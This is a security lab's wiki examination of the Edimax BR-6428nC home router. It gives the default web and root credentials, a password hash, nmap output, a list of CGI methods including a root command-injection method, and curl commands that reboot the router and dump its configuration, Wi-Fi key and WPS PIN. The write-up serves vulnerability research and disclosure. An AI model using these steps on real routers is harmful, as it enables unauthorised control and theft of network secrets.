Examination of Edimax home devices

From Embedded Lab Vienna for IoT & Security
Jump to: navigation, search

Summary

Edimax Technology focuses on networking devices for home applications. The device under investigation here showed a vulnerability to inject almost any command as root by calling a Common Gateway Interface (CGI) for any attacker, which has access to the network and knows the HTTP authentication. Where the default credentials are communicated by the webserver when executing basic NMAP scan.

Introduction

BR-6428nC: 3-in-1 application

Since Edimax’s establishment in 1986, they have grown to be one of the world’s leading manufacturers of advanced network communication products. Edimax Technology is dedicated to the design, development, manufacture, and marketing of a broad range of networking solutions. The company’s core values include quality service, professional R&D and innovation. Edimax products are all CE, FCC and C-Tick emission certified. Our wireless 802.11n and 802.11ac range is Wi-Fi certified and our drivers are tested by Microsoft and NSTL to ensure interoperability. In addition to being ISO 9001 and ISO 14000 certified in 2003, Edimax has formed strategic partnerships with several chipset vendors. Edimax is also an active member of both the Wi-Fi Alliance and the Gigabit Ethernet Alliance.

Edimax is committed to bring the latest networking technologies to the customer at the most affordable price. Their wide and comprehensive product lines satisfy the connectivity needs of any networking architecture or application for home and business. The complete range of our products include wireless solutions, print servers, xDSL routers, Ethernet switches, PoE solutions, powerline solutions, network access controllers, load balancer solutions, network cameras, professional surveillance cameras, VoIP solutions, KVM switches, media converters, home entertainment integration solutions and other customer-oriented networking applications. Additionally we offer the high-performance Edimax Pro range of enterprise solutions.

Source: [Edimax Profile]

Edimax BR-6428nC: N300 Wireless Router

The BR-6428nC is a 300Mbps high-speed multi-function Wi-Fi solution which supports IEEE 802.11b/g/n standards and provides significantly improved coverage with the 9dBi antenna. Operating as a router, access point or range extender, the BR-6428nC’s flexibility meets the demands of any networking applications. Impressive performance and a competitive price make the BR-6428nC a cost-effective solution for home or small office environments.

Source: [Product Link]

Examination

Summary

ⓘ Collected Information
Device Model BR-6428nC
Manufacturer Edimax
Product Type Router
Description 3-in-1 Router, AP, and Range Extender
Price on Release 30 Euro
Release 2015 Q1 (Continuing as of April 2020)
State of Research It was not possible to enable input via UART; the board shows several soldering points; Only bootlog information could be capured
Ports 4xGbE, 2xWLAN Antenna
Buttons WPS/Reset
LED Power, WLAN, WAN, 4xLAN
Power 5V/1A DC
WLAN 2,4GHz 802.11b/g/n up to 300MBit/s
Other N/A
FCC-ID NDD9564281303
System RTL8196E_1200
Processor RTL8196E 2014.09.22 v0.3 [16bit] (380MHz)
BogoMIPS
Memory DRAM: 16MB [16bit]
Storage
Ethernet MAC 74:DA38:F8:DE:E5
WLAN MAC 74:DA38:F8:DE:E4
WLAN SSID edimax.setup (Changed during setup)
WLAN PSK
Default IPv4 192.168.2.1
Hostname
NET Protocols
Interfaces
Ports
Webpage https://edimax.setup
Webaccess admin: 1234
Root Password edimaxens (init.sh); $1$iNT/snisG/y7YBVbw0tQaaaA (boa.passwd)
Other Login Pw
Firmware v1.16
Hardware Rev. A
Baudrate 38400 (8N1)
Bootdelay 1s
Bootloader Access by pressing ESC or the WPS button on boot.
mtdparts
Filesystem squashfs
Image
Linux 2.4.18
Kernel cmdline root=/dev/mtdblock1 fconsole=0 single
Shell
BusyBox
Services

Network Mapper

Edimax BR-6428nC: N300 Multi-Function Wi-Fi Router

Wide Area Network (WAN)

Host is up.
All 1000 scanned ports on 192.168.86.40 are filtered

Local Area Network (LAN)

PORT      STATE SERVICE VERSION
80/tcp    open  http    Boa HTTPd 0.94.14rc21
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|   Server returned status 401 but the WWW-Authenticate header could not be parsed.
|_  WWW-Authenticate: Basic realm="Default Name:admin Password:1234
|_http-server-header: Boa/0.94.14rc21
|_http-title: 400 Bad Request

52881/tcp open  upnp    MiniUPnP

Note: This scan has been executed after a basic setup without applying any custom firmware configuration.

Warning: The webserver is communicating the default credentials.

Web Interface

The BR-6428nC can work as router, access point or range extender. One of these modes can be selected during the setup by browsing to http://edimax.setup and following the step-by-step procedure as shown below.

Note: The SSID, which was edimax.setup too, has to be changed during the setup, but the webserver will still respond to http://edimax.setup after the initial setup. The Web Interface is protected by HTTP Authentication mechanism with the default credentials admin:1234, which are already communicated by the webserver when executing a NMAP scan.

Edimax BR-6428nC v1.16: Setup
Edimax BR-6428nC v1.16: Configuration
Note: Default credentials: admin:1234
Status
Setup Wizard
Internet
LAN
Wireless
Firewall
QoS
Advance
Administration

The web interface itself provides a lot of configuration options which are accessbible over CGIs integrated with the BOA webserver. The GCI code is called when submitting a form on the regular ASP webpage and the sourcecode is not available when extracting the firmware. Since the CGI has always the same form of /goform/$METHOD, it is rather simple to recursivly search for all employed CGI methods within the web root directory, which is listed below including the BOA configuration.

Edimax BR-6428nC v1.16: BOA root directory
└── web
    ├── FUNCTION_SCRIPT
    ├── aIndex.asp
    ├── aconnected.asp
    ├── addPC.asp
    ├── adhcp_fail.asp
    ├── admin_activeDhcpClient.asp
    ├── admin_backrestore.asp
    ├── admin_logs.asp
    ├── admin_logs2.asp
    ├── admin_password.asp
    ├── admin_remotmang.asp
    ├── admin_restart.asp
    ├── admin_statistics.asp
    ├── admin_timezone.asp
    ├── admin_upgrade.asp
    ├── adv_alg.asp
    ├── adv_dmz.asp
    ├── adv_dos.asp
    ├── adv_firewal.asp
    ├── adv_igmp.asp
    ├── adv_portforward.asp
    ├── adv_staticrout.asp
    ├── adv_upnp.asp
    ├── adv_virtserver.asp
    ├── adv_wireless.asp
    ├── advanced_management.asp
    ├── afail.asp
    ├── apppoe.asp
    ├── conclusion.asp
    ├── conn_test.asp
    ├── connect_redirect.asp
    ├── connectmsg.asp
    ├── detect.asp
    ├── file
    │   ├── allasp-n.var
    │   ├── autowan.var
    │   ├── javascript.js
    │   ├── jquery-1.7.1.min.js
    │   ├── multilanguage.var
    │   ├── p6.gif
    │   └── set.css
    ├── graphics
    │   ├── ap_mode.jpg
    │   ├── ap_setup.gif
    │   ├── back-a.gif
    │   ├── banner.png
    │   ├── bg.jpg
    │   ├── bg1.jpg
    │   ├── cancel.png
    │   ├── check.png
    │   ├── dot-1.png
    │   ├── dot-2.png
    │   ├── loading.gif
    │   ├── logo.gif
    │   ├── no_connect.jpg
    │   ├── repeater_mode.jpg
    │   ├── repeater_setup.gif
    │   ├── router_mode.jpg
    │   ├── router_setup.gif
    │   ├── step1.jpg
    │   ├── step2.jpg
    │   ├── step3.jpg
    │   ├── step4.jpg
    │   └── wifi_24G.png
    ├── guest_wireless_basic.asp
    ├── hwsetup.asp
    ├── index.asp
    ├── index1.asp
    ├── inter_ddns.asp
    ├── inter_wan.asp
    ├── lan.asp
    ├── lan_ap.asp
    ├── last.asp
    ├── left_list.asp
    ├── left_list_ap.asp
    ├── left_list_rep.asp
    ├── main.asp
    ├── mdhcp.asp
    ├── mfail.asp
    ├── ml2tp.asp
    ├── mp.asp
    ├── mpppoe.asp
    ├── mpptp.asp
    ├── mstart.asp
    ├── mstatic.asp
    ├── msuccess.asp
    ├── probe.asp
    ├── qos.asp
    ├── qosadd.asp
    ├── redirect.asp
    ├── replace.asp
    ├── security_block.asp
    ├── security_block1.asp
    ├── set.css
    ├── setup_3wizard.asp
    ├── setup_3wizard_1.asp
    ├── setup_3wizard_2.asp
    ├── setup_3wizard_3.asp
    ├── setup_wizard.asp
    ├── status.asp
    ├── status_noInternet.asp
    ├── wifi.asp
    ├── wireless_access.asp
    ├── wireless_basic.asp
    ├── wireless_schedule.asp
    ├── wireless_wps.asp
    ├── wisp_wlsurvey.asp
    ├── wiz_3in1.asp
    ├── wiz_apmode1.asp
    ├── wiz_ip.asp
    ├── wiz_repeatermode1.asp
    ├── wiz_repeatermode2.asp
    ├── wizard_security.asp
    ├── wlClient.asp
    ├── wlWDS3_key.asp
    ├── wlWDS4_key.asp
    ├── wlWDS5_key.asp
    └── wlsurvey.asp
Edimax BR-6428nC v1.16: boa.config
Port 80
User root
ServerAdmin root@localhost
ServerName ""
DocumentRoot /web
UserDir public_html
DirectoryIndex index1.asp
DirectoryMaker /usr/lib/boa/boa_indexer
KeepAliveMax 1000
KeepAliveTimeout 10
MimeTypes /etc/boa/mime.types
DefaultType text/plain
AddType application/x-httpd-cgi asp
Auth /  /etc/boa/boa.passwd
PidFile /var/run/webs.pid
Note: All webpages under /web are herewith protected agains unauthorized access.

In order to investigate further for vulnerabilities of these CGI methods, the GLP Source Code has been of great use, which is also availible in the product's download section. Using the GLP Source Code, the investigation started by looking into the C source code of the BOA server under RTL8196C_Edimax/AP/boa-0.94.14rc21/src/. Here, the file fmmgmt.c contains all the CGI callable functions' source code.

Edimax BR-6428nC v1.16: CGI callable methods
formAccept         (Parameter: {"submit-url"})
(!)  formReboot         (Parameter: {"submit-url"})
     formApply          (Parameter: {"submit-url"})
     formConnect        (Parameter: {"submit-url", "wanMode": int, "buttonact": {"Connect", "Disconnect"}})
     formSysLog         (Parameter: {"submit-url", "send": {"1", "0"}, "reset": {"1", "0"}})
     formSecLog         (Parameter: {"submit-url", "send": {"1", "0"}, "reset": {"1", "0"}})
(!)  formDebug          (Parameter: {"password": "report.txt"})
     formSaveConfig     (Parameter: {"save-cs", "save", "save-hs", "save-ds", "save-all"})
     formUploadConfig   (Parameter: {postData})
(!!) formwizResetDefault(Parameter: None)
(!!) formResetDefault   (Parameter: None)
     formUpload         (Parameter: {"submit-url", postData})
     formPasswordSetup  (Parameter: {"newpass", "oldpass", "submit-url"})
     formStats          (Parameter: {"submit-url"})
(!!!) mp                (Parameter: {"command"})
     formrefresh        (Parameter: {"filtermode": {"1", "0"}, "submit-url"})
     formAdvManagement  (Parameter: {"AdvSetup_verifyCode": {"Edimax"}, "AdvSetup_manualAdaptivityEnabled": {"1", "0"}, "AdvSetup_adaptivity24g": {"1", "0"}, "AdvSetup_into_effect"})

Example 1: formReboot
$ curl --User admin:1234 192.168.2.1/goform/formReboot --data ''
<html>
<!--OK_MSG3--><head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Expires" content="-1">
<link rel="stylesheet" href="/set.css?time=201509241321">
<meta http-equiv="Content-Type" content="text/html">
<script type="text/javascript" src="/file/javascript.js?time=201509241321"></script>
<script type="text/javascript" src="/file/multilanguage.var?time=201509241321"></script>
<title></title>
</head>
<body>
<blockquote><br><br><div class="restartInfo"><script>document.write(showText(SystemRestarting));</script></div><br><br>
<form name="test">
<script>document.write('<input type=button name="okbutton" value="'+showText(OK)+'" class="ui-button" OnClick=window.location.replace("")>');</script>
</form>
</blockquote>
<script>
var secs = 60;
var wait = secs * 1000;
document.test.okbutton.value = showText(OK) + "(" + secs + ")";
document.test.okbutton.disabled = true;
for(i = 1; i <= secs; i++) setTimeout("update(" + i + ")", i * 1000);
setTimeout("timer()", wait);
function update(num, value)
{
if (num == (wait/1000)) document.test.okbutton.value = showText(OK);
else
{
printnr = (wait / 1000)-num;
document.test.okbutton.value = showText(OK) + "(" + printnr + ")";
}
}
function timer()
{
document.test.okbutton.disabled = false;
document.test.okbutton.value = showText(OK);
}
</script>
</body>
</html>
Example 2: formdebug
$ curl --User admin:1234 192.168.2.1/goform/formDebug --data 'password=report.txt'

System Log create time : 2020-05-02 15:39:25

Firmware Version: 1.16

Compiler date: 2015.09.24-13:21:41

------ Config setting -------
HW_BOARD_ID=1
HW_NIC0_ADDR=74da38f8dee4
HW_NIC1_ADDR=74da38f8dee5
HW_WLAN_ADDR=74da38f8dee4
HW_WLAN_ADDR1=00e04c8196c2
HW_WLAN_ADDR2=00e04c8196c3
HW_WLAN_ADDR3=00e04c8196c4
HW_WLAN_ADDR4=00e04c8196c5
HW_WLAN_ADDR5=00e04c8196c6
HW_WLAN_ADDR6=00e04c8196c7
HW_WLAN_ADDR7=00e04c8196c8
HW_REG_DOMAIN=3
HW_RF_TYPE=10
HW_TX_POWER_CCK_A=2424242424242424242525252525
HW_TX_POWER_CCK_B=0000000000000000000000000000
HW_TX_POWER_HT40_1S_A=2525252525252525252727272727
HW_TX_POWER_HT40_1S_B=3030303030303030302e2e2e2e2e
HW_TX_POWER_DIFF_HT40_2S=0000000000000000000000000000
HW_TX_POWER_DIFF_HT20=000000000000000000f0f0f0f0f0
HW_TX_POWER_DIFF_OFDM=1212121212121212120202020202
HW_11N_XCAP=49
HW_11N_TSSI1=0
HW_11N_TSSI2=0
HW_11N_THER=35
HW_11N_TRSWITCH=0
HW_PWTBL_B=68
HW_PWTBL_G=170
HW_PWTBL_N_20M=170
HW_PWTBL_N_40M=136
HW_PWTBL_ENABLE=1
HW_11N_RESERVED7=0
HW_11N_RESERVED8=0
HW_11N_RESERVED9=0
HW_11N_RESERVED10=0
HW_LED_TYPE=0
HW_TX_POWER_5G_HT40_1S_A=00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
HW_TX_POWER_5G_HT40_1S_B=00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
HW_TX_POWER_DIFF_5G_HT40_2S=00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
HW_TX_POWER_DIFF_5G_HT20=00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
HW_TX_POWER_DIFF_5G_OFDM=00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
HW_WSC_PIN=''
DHCP_CLIENT_START='192.168.2.100'
DHCP_CLIENT_END='192.168.2.200'
LICENCE=1
WAN_DHCP=0
DNS_MODE=0
DNS1='0.0.0.0'
DNS2='0.0.0.0'
DNS3='0.0.0.0'
WAN_MODE=0
DYNIP_HOSTNAME=""
WAN_MAC_ADDR=000000000000
WAN_IP_ADDR='172.1.1.1'
WAN_SUBNET_MASK='255.255.0.0'
WAN_DEFAULT_GATEWAY='172.1.1.254'
PPP_USER_NAME=''
PPP_IDLE_TIME=600
PPP_CONNECT_TYPE=0
PPP_SERVNAME=''
PPP_MTU=1392
PPP_TTL_ENABLED=0
PPTP_IPMODE=0
PPTP_IP_ADDR='0.0.0.0'
PPTP_IP_MASK_ADDR='0.0.0.0'
PPTP_DEF_GATEWAY='0.0.0.0'
PPTP_GATEWAY='0.0.0.0'
PPTP_USER_NAME=''
PPTP_IDLE_TIME=600
PPTP_CONNECT_TYPE=0
PPTP_CONNT_ID=''
PPTP_BEZEQ_ENABLED=0
PPTP_MTU=1392
L2TP_IPMODE=0
L2TP_IP_ADDR='0.0.0.0'
L2TP_MASK_ADDR='0.0.0.0'
L2TP_DEFGATEWAY='0.0.0.0'
L2TP_GATEWAY=''
L2TP_USER_NAME=''
L2TP_IDLE_TIME=600
L2TP_CONNECT_TYPE=0
L2TP_MTU=1392
TELBP_IP_ADDR='0.0.0.0'
TELBP_USER_NAME=''
TELBP_ENABLED=0
PORTFW_ENABLED=0
PORTFW_TBL_NUM=0
IPFILTER_ENABLED=0
IPFILTER_TBL_NUM=0
DMZ_TBL_NUM=0
URLB_ENABLED=0
URLB_TBL_NUM=0
ACPC_ENABLED=0
IPDENY_ENABLED=1
ACPC_TBL_NUM=0
MACDENY_ENABLED=1
MACFILTER_ENABLED=0
MACFILTER_TBL_NUM=0
PORTFILTER_ENABLED=0
PORTFILTER_TBL_NUM=0
TRIGGERPORT_ENABLED=0
TRIGGERPORT_TBL_NUM=0
DMZ_ENABLED=0
SROUT_ENABLED=0
SROUT_TBL_NUM=0
WAN1_QOS_ENABLED=0
WAN1_QOS_TBL_NUM=0
SDHCP_ENABLED=0
SDHCP_TBL_NUM=0
WLAN_TX_POWER=0
WLAN_WMM=1
WLAN_TURBO=0
WLAN_N_FIXRATE=0
WLAN_N_CHAN_WIDTH=1
WLAN_TRAN_RATE='auto'
WLAN_RATE_MODE=0
WLAN_CTS=0
WLAN_BURST=0
WEP152_KEY1=00000000000000000000000000000000
WEP152_KEY2=00000000000000000000000000000000
WEP152_KEY3=00000000000000000000000000000000
WEP152_KEY4=00000000000000000000000000000000
DOT1X_MODE=0
ELAN_MAC_ADDR=000000000000
WLAN_MAC_ADDR=000000000000
SSID="edimax.BR-6428nC"
CHANNEL=0
WEP=0
WEP64_KEY1=0000000000
WEP64_KEY2=0000000000
WEP64_KEY3=0000000000
WEP64_KEY4=0000000000
WEP128_KEY1=00000000000000000000000000
WEP128_KEY2=00000000000000000000000000
WEP128_KEY3=00000000000000000000000000
WEP128_KEY4=00000000000000000000000000
WEP_DEFAULT_KEY=0
WEP_KEY_TYPE=1
FRAG_THRESHOLD=2346
SUPPORTED_RATES=4095
BEACON_INTERVAL=100
PREAMBLE_TYPE=0
BASIC_RATES=15
RTS_THRESHOLD=2347
AUTH_TYPE=2
HIDDEN_SSID=0
WLAN_DISABLED=0
INACTIVITY_TIME=30000
RATE_ADAPTIVE_ENABLED=1
DTIM_PERIOD=3
NETWORK_TYPE=0
IAPP_DISABLED=0
PROTECTION_DISABLED=1
MACCLONE_ENABLED=0
BAND=5
FIX_RATE=0
WPA2_PRE_AUTH=0
WPA2_CIPHER_SUITE=2
WLAN_SET_TX=0
AP_MODE=0
SECURITY_MODE=2
CLIENT_IP_DISABLED=0
WLAN_BLOCK_RELAY=0
AUTO_MAC_CLONE=0
OP_MODE=0
WISP_WAN_ID=0
WL_LINKMAC1=000000000000
WL_LINKMAC2=000000000000
WL_LINKMAC3=000000000000
WL_LINKMAC4=000000000000
WL_LINKMAC5=000000000000
WL_LINKMAC6=000000000000
WDS_ENABLED=0
WLAN_WDS_ENCRYPT=0
WLAN_WDS_WPA_AUTH=2
WLAN_WDS_WPA_CIPHER_SUITE=1
WLAN_WDS_WPA2_CIPHER_SUITE=0
WLAN_WDS_WPA_PSK=""
WLAN_WDS_PSK_FORMAT=0
WLAN_ENCRYPT=4
WLAN_ENABLE_SUPP_NONWPA=0
WLAN_SUPP_NONWPA=0
WLAN_WPA_AUTH=2
WLAN_WPA_CIPHER_SUITE=0
WLAN_WPA_PSK="\$uePa_\$3cUrrr3_Pw"
WLAN_WPA_GROUP_REKEY_TIME=86400
MAC_AUTH_ENABLED=0
RS_IP='0.0.0.0'
RS_PORT=1812
RS_MAXRETRY=3
RS_INTERVAL_TIME=5
ACCOUNT_RS_ENABLED=0
ACCOUNT_RS_IP='0.0.0.0'
ACCOUNT_RS_PORT=1813
ACCOUNT_RS_UPDATE_ENABLED=0
ACCOUNT_RS_UPDATE_DELAY=60
ACCOUNT_RS_MAXRETRY=3
ACCOUNT_RS_INTERVAL_TIME=5
WLAN_ENABLE_1X=0
WLAN_PSK_FORMAT=0
IP_ADDR='192.168.2.1'
DHCPGATEWAYIP_ADDR='0.0.0.0'
DHCPNAMESERVER_ADDR='0.0.0.0'
DOMAIN_NAME=''
LAN_LEASE_TIME=3600
SUBNET_MASK='255.255.255.0'
DEFAULT_GATEWAY='0.0.0.0'
DHCP=2
STP_ENABLED=0
WLAN_MACAC_NUM=0
WLAN_MACAC_ENABLED=0
SUPER_NAME='super'
USER_NAME='admin'
TIME_ZONE_SEL=22
START_MONTH=1
START_DAY=1
END_MONTH=1
END_DAY=1
TIMESERVER_ADDR='59.124.196.83'
DAYLIGHT_ENABLE=0
REMANHOST_ADDR='0.0.0.0'
REMAN_PORT=8080
REMANG_ENABLE=0
UPNP_ENABLE=0
NAT_ENABLE=1
FAST_NAT_ENABLE=0
FIREWALL_ENABLE=1
VSER_ENABLED=0
VSER_TBL_NUM=0
POD_ENABLED=0
PIN_ENABLED=0
SCAN_ENABLED=0
SYN_ENABLED=0
POD_PACK=5
POD_TIME=0
POD_BUR=5
SYN_PACK=30
SYN_TIME=0
SYN_BUR=30
SCAN_NUM=nmap,xmastree,axmastree,nullscan,synrst,synfin,synouport
DDNS_NAME=''
DDNS_ACCOUNT=''
DDNS_PASS=''
DDNS_ENABLED=0
DDNS_PVID_SEL='dyndns'
APP_LAYER_GATEWAY=ftp,h323,ipsec,pptp,l2tp,sip
DHIS_HOSTID=0
DHIS_ISADDR='0.0.0.0'
DHIS_AUTH_P1=''
DHIS_AUTH_P2=''
DHIS_AUTH_Q1=''
DHIS_AUTH_Q2=''
DHIS_SELECT=0
MAX_DOWNLOAD_BANDWIDTH=0
MAX_UPLOAD_BANDWIDTH=0
REPEATER_ENABLED=0
REPEATER_SSID=""
PS_ENABLE=1
PS_IPPENABLE=1
PS_LPRENABLE=1
PS_NAME=''
PS_PORT1NAME='lpt1'
PS_PORT2NAME=''
AP_ROUTER_SWITCH=0
WPS_ENABLE=1
WPS_CONFIG_MODE=7
WPS_PROXY_ENABLE=0
WPS_INTERNAL_REG=0
WPS_CONFIG_TYPE=1
WPS_CONFIG_STATUS=1
WPS_PIN_CODE='58340844'
WPS_DISPLAY_KEY=0
WLAN_NOFORWARD=0
DDNS_STATUS=0
AUTO_BRIDGE=0
WIFI_TEST=0
IS_RESET_DEFAULT=1
IGMP_PROXY_ENABLED=1
BAND_1=0
SSID_1="edimax.guest"
WEP64_KEY1_1=0000000000
WEP64_KEY2_1=0000000000
WEP64_KEY3_1=0000000000
WEP64_KEY4_1=0000000000
WEP128_KEY1_1=00000000000000000000000000
WEP128_KEY2_1=00000000000000000000000000
WEP128_KEY3_1=00000000000000000000000000
WEP128_KEY4_1=00000000000000000000000000
WLAN_WPA_PSK_1=""
SECURITY_MODE_1=0
WLAN_ENABLE_1X_1=0
WEP_1=0
WEP_KEY_TYPE_1=0
WLAN_WPA_CIPHER_SUITE_1=1
WPA2_CIPHER_SUITE_1=0
WLAN_PSK_FORMAT_1=0
WEP_DEFAULT_KEY_1=0
SSID_MIRROR_1=0
FIX_RATE_1=0
HIDDEN_SSID_1=0
WLAN_WMM_1=0
WLAN_ACCESS_1=0
WLAN_ENCRYPT_1=0
AUTH_TYPE_1=0
WLAN_WPA_AUTH_1=2
WLAN_SCH_ENABLED=0
WLAN_SCH_NUM=0
STADRV_SSID=""
STADRV_CHANNEL=0
STADRV_BAND=0
STADRV_ENCRYPT_TYPE=0
STADRV_WEP_LENGTH=0
STADRV_WEP_FORMAT1=0
STADRV_WEP_FORMAT2=0
MANUAL_ADAPTIVITY_ENABLE=0
ADAPTIVITY_24G_ENABLE=0
STADRV_WEP_DEFAULT_KEY=0
STADRV_WPA_CIPHER=1
STADRV_PSK_FORMAT=0
STADRV_WEPKEY1=''
STADRV_WEPKEY2=''
STADRV_WEPKEY3=''
STADRV_WEPKEY4=''
STADRV_PSKKEY=''
STADRV_CLONEMAC=000000000000
DUALL_ACCESS_ENABLE=0
DUALL_ACCESS_MODE=0
DUAL_WAN_IGMP=0
SERVER_SEL=0
SERVER_AUTO=0
DHCP_MTU=1500
STATIC_MTU=1500
IGMPSNOOP_ENABLE=1
WIZ_MODE=0
IQ_DONE=1
DHCP_SWITCH=1
DHCP_CHECK_ENABLED=0
WLAN_BLOCK_RELAY_1=0
WLAN_BLOCK_RELAY_2=0
WLAN_BLOCK_RELAY_3=0
WLAN_BLOCK_RELAY_4=0
_WAN_IF_="eth1"
_LAN_IF_="eth0"
-----------------------------
#############################
#          meminfo          #
#############################
        total:    used:    free:  shared: buffers:  cached:
Mem:  10895360  8724480  2170880        0   790528  2813952
Swap:        0        0        0
MemTotal:        10640 kB
MemFree:          2120 kB
MemShared:           0 kB
Buffers:           772 kB
Cached:           2748 kB
SwapCached:          0 kB
Active:           1648 kB
Inactive:         3372 kB
HighTotal:           0 kB
HighFree:            0 kB
LowTotal:        10640 kB
LowFree:          2120 kB
SwapTotal:           0 kB
SwapFree:            0 kB

#############################
#          modules          #
#############################

#############################
#          ps               #
#############################
  PID USER       VSZ STAT COMMAND
    1 root      1140 S    init        
    2 root         0 SW   [keventd]
    3 root         0 SWN  [ksoftirqd_CPU0]
    4 root         0 SW   [kswapd]
    5 root         0 SW   [bdflush]
    6 root         0 SW   [kupdated]
    7 root         0 SW   [mtdblockd]
    9 root      1160 S    -/bin/sh 
   65 root      1240 S    syslogd -C 
   66 root       848 S    reload 
  442 root      1140 S    udhcpd /var/udhcpd.conf 
  480 root       988 S    lld2d br0 
  611 root      1384 S    dnrd -c off --server=192.168.86.1 
  814 root      1256 S    /bin/sh /bin/cleanlog.sh 
  815 root       852 S    setup 
  833 root      1148 S    crond -L /var/cron/crond.log -l 0 
  884 root      1840 S    webs 
 1030 root       864 S    iapp br0 wlan0 
 1102 root      1180 S    wscd -start -c /var/wsc.conf -w wlan0 -fi /var/wscd-w
 1107 root       888 S    iwcontrol wlan0 
 1146 root       888 S    /bin/igmpproxy eth1 br0 -D 
 1147 root      1144 S    udhcpc -i eth1 -p /var/udhcpc/udhcpc-eth1.pid -s /etc
 2193 root      1136 S    sleep 10 
 2248 root      1140 S    sh -c /bin/savelog.sh 
 2249 root      1240 S    /bin/sh /bin/savelog.sh 
 2257 root      1140 R    ps -ax 

#############################
#          ifconfig         #
#############################
br0       Link encap:Ethernet  HWaddr 74:DA:38:F8:DE:E4  
          inet addr:192.168.2.1  Bcast:192.168.2.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:120 errors:0 dropped:0 overruns:0 frame:0
          TX packets:135 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:15035 (14.6 KiB)  TX bytes:26691 (26.0 KiB)

eth0      Link encap:Ethernet  HWaddr 74:DA:38:F8:DE:E4  
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:120 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:100 
          RX bytes:0 (0.0 B)  TX bytes:24699 (24.1 KiB)
          Interrupt:2 Base address:0x4000 

eth1      Link encap:Ethernet  HWaddr 74:DA:38:F8:DE:E5  
          inet addr:192.168.86.32  Bcast:192.168.86.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:666 errors:0 dropped:0 overruns:0 frame:0
          TX packets:35 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:100 
          RX bytes:112288 (109.6 KiB)  TX bytes:2834 (2.7 KiB)
          Interrupt:2 Base address:0x4000 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.255.255.255
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

wlan0     Link encap:Ethernet  HWaddr 74:DA:38:F8:DE:E4  
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:3048 errors:0 dropped:0 overruns:0 frame:0
          TX packets:197 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:100 
          RX bytes:702678 (686.2 KiB)  TX bytes:49984 (48.8 KiB)
          Interrupt:21 


#############################
#          route            #
#############################
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
224.0.1.178     0.0.0.0         255.255.255.255 UH    0      0        0 br0
192.168.86.1    0.0.0.0         255.255.255.255 UH    0      0        0 eth1
239.255.255.250 0.0.0.0         255.255.255.255 UH    0      0        0 br0
192.168.86.0    0.0.0.0         255.255.255.0   U     0      0        0 eth1
192.168.2.0     0.0.0.0         255.255.255.0   U     0      0        0 br0
0.0.0.0         192.168.86.1    0.0.0.0         UG    0      0        0 eth1

#############################
#        iptables -L -xv    #
#############################
Chain INPUT (policy ACCEPT 446 packets, 92389 bytes)
    pkts      bytes target     prot opt in     out     source               destination         
       0        0 DROP       tcp  --  eth1   *       0.0.0.0/0            192.168.86.32       tcp flags:0x3F/0x02 
       0        0 DROP       tcp  --  eth1   *       0.0.0.0/0            0.0.0.0/0           tcp flags:0x3F/0x00 
       0        0 DROP       tcp  --  eth1   *       0.0.0.0/0            0.0.0.0/0           tcp flags:0x3F/0x01 
       0        0 DROP       tcp  --  eth1   *       0.0.0.0/0            0.0.0.0/0           tcp flags:0x3F/0x29 
       0        0 DROP       tcp  --  eth1   *       0.0.0.0/0            0.0.0.0/0           tcp dpt:53 
       0        0 DROP       udp  --  eth1   *       0.0.0.0/0            0.0.0.0/0           udp dpt:53 

Chain FORWARD (policy ACCEPT 0 packets, 0 bytes)
    pkts      bytes target     prot opt in     out     source               destination         

Chain OUTPUT (policy ACCEPT 135 packets, 24521 bytes)
    pkts      bytes target     prot opt in     out     source               destination         

#############################
#   iptables -L -t nat -xv  #
#############################
Chain PREROUTING (policy ACCEPT 88 packets, 16398 bytes)
    pkts      bytes target     prot opt in     out     source               destination         
       0        0 DROP       all  --  eth1   *       0.0.0.0/0            192.168.2.0/24      
       0        0 DROP       tcp  --  eth1   *       0.0.0.0/0            0.0.0.0/0           tcp dpt:80 

Chain POSTROUTING (policy ACCEPT 9 packets, 918 bytes)
    pkts      bytes target     prot opt in     out     source               destination         
       3      218 MASQUERADE  all  --  *      eth1    0.0.0.0/0            0.0.0.0/0           

